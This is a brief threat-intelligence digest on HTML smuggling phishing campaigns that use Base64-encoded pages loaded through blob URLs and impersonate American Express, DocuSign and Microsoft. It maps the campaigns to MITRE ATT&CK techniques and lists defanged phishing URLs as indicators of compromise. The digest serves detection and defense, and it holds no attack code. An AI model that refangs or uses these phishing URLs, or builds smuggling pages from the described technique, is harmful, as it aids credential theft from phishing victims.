HTML smuggling encodes HTML as Base64 and loads it in the browser via blob URLs, enabling phishing pages to evade many security checks. Trustwave SpiderLabs documented campaigns impersonating brands like American Express, with samples tied to DocuSign and Microsoft and hosted in a Cloudflare R2 bucket. #HTMLSmuggling #BlobURL #TrustwaveSpiderLabs #AmericanExpress #DocuSign #Microsoft #CloudflareR2
Keypoints
- HTML smuggling enables attackers to generate malicious files directly in the browser using JavaScript.
- Phishing emails can redirect users to blob URLs that host encoded HTML phishing pages.
- Blob URLs help create files that can evade traditional security filters.
- Attackers can distribute harmful payloads disguised as legitimate files.
- The technique complicates detection by security systems.
- Future phishing attacks are expected to grow more sophisticated by leveraging HTML smuggling.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link – “Use of phishing emails to deliver malicious payloads.”
- [T1059.007] JavaScript – “Execution of JavaScript code to decode and display phishing content.”
- [T1027] Obfuscated/Compressed Files and Information – “The actual HTML phishing page is encoded in a long Base64 string.”
- [T1078] Valid Accounts – “Phishing techniques aimed at stealing user credentials.”
Indicators of Compromise
- [URL] Phishing-related redirects and hosting domains – https://www.imperauto[.]com[.]br/tmp/Y8Z57m, https://csp[.]wsiz[.]pl/wp-admin/one[.]htm, and 1 more related URL
- [Blob URL] Blob URI used to host the decoded HTML content – blob:hxxps://pub-bbe243ba90f4462ea7249d1206164f64[.]r2[.]dev/013a95bc-e14b-40b6-9524-762cfa05262b